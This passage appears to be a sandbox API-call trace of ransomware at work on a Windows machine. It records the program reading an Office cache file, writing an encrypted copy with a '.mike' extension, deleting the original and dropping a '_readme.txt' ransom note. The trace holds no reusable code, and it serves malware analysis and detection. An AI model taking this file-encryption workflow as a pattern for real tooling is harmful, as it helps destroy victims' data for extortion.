lpOldMode=0x2af1c4) returned 1 [0041.743] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.743] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b81dc | out: lpFileInformation=0x22b81dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4)) returned 1 [0041.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.744] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.744] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.744] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.744] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.744] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.744] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.744] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.744] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.744] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.745] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.745] GetFileType (hFile=0x264) returned 0x1 [0041.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.745] GetFileType (hFile=0x264) returned 0x1 [0041.746] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.746] WriteFile (in: hFile=0x264, lpBuffer=0x22b9118*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22b9118*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.746] CloseHandle (hObject=0x264) returned 1 [0041.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.747] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b8bec | out: lpFileInformation=0x22b8bec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4)) returned 1 [0041.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.747] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.747] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.747] GetFileType (hFile=0x264) returned 0x1 [0041.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.747] GetFileType (hFile=0x264) returned 0x1 [0041.747] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.747] ReadFile (in: hFile=0x264, lpBuffer=0x22ba254, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22ba254*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.749] CloseHandle (hObject=0x264) returned 1 [0041.750] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.750] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.750] GetFileType (hFile=0x264) returned 0x1 [0041.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.750] GetFileType (hFile=0x264) returned 0x1 [0041.750] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.750] WriteFile (in: hFile=0x264, lpBuffer=0x22c47bc*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x22c47bc*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.750] CloseHandle (hObject=0x264) returned 1 [0041.751] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.751] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.751] GetFileType (hFile=0x264) returned 0x1 [0041.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.751] GetFileType (hFile=0x264) returned 0x1 [0041.751] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0041.751] ReadFile (in: hFile=0x264, lpBuffer=0x22c723c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22c723c*, lpNumberOfBytesRead=0x2af110*=0x19d4, lpOverlapped=0x0) returned 1 [0041.752] CloseHandle (hObject=0x264) returned 1 [0041.752] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.752] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.752] GetFileType (hFile=0x264) returned 0x1 [0041.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.752] GetFileType (hFile=0x264) returned 0x1 [0041.752] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2a20 [0041.753] WriteFile (in: hFile=0x264, lpBuffer=0x22d20ec*, nNumberOfBytesToWrite=0x19e0, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x22d20ec*, lpNumberOfBytesWritten=0x2af124*=0x19e0, lpOverlapped=0x0) returned 1 [0041.753] CloseHandle (hObject=0x264) returned 1 [0041.754] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.754] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.754] GetFileType (hFile=0x264) returned 0x1 [0041.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.754] GetFileType (hFile=0x264) returned 0x1 [0041.755] WriteFile (in: hFile=0x264, lpBuffer=0x22d5e4c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22d5e4c*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.755] CloseHandle (hObject=0x264) returned 1 [0041.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.756] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3151e20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3151e20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3177f80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4400)) returned 1 [0041.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.756] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22d760c | out: lpFileInformation=0x22d760c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3151e20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3151e20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3177f80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4400)) returned 1 [0041.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.756] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", dwFileAttributes=0x80) returned 1 [0041.757] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.757] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0041.757] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.758] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.758] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.758] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.758] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.759] GetFileType (hFile=0x264) returned 0x1 [0041.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.759] GetFileType (hFile=0x264) returned 0x1 [0041.759] WriteFile (in: hFile=0x264, lpBuffer=0x22d932c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x22d932c*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.760] CloseHandle (hObject=0x264) returned 1 [0041.760] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", lpFilePart=0x0) returned 0x4a [0041.760] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", lpFilePart=0x0) returned 0x4b [0041.760] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", lpFilePart=0x0) returned 0x48 [0041.775] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.775] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.775] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.775] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.776] GetFileType (hFile=0x264) returned 0x1 [0041.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.776] GetFileType (hFile=0x264) returned 0x1 [0041.776] CloseHandle (hObject=0x264) returned 1 [0041.776] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.776] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.776] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.777] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.777] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x20db900 | out: lpFileInformation=0x20db900*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, 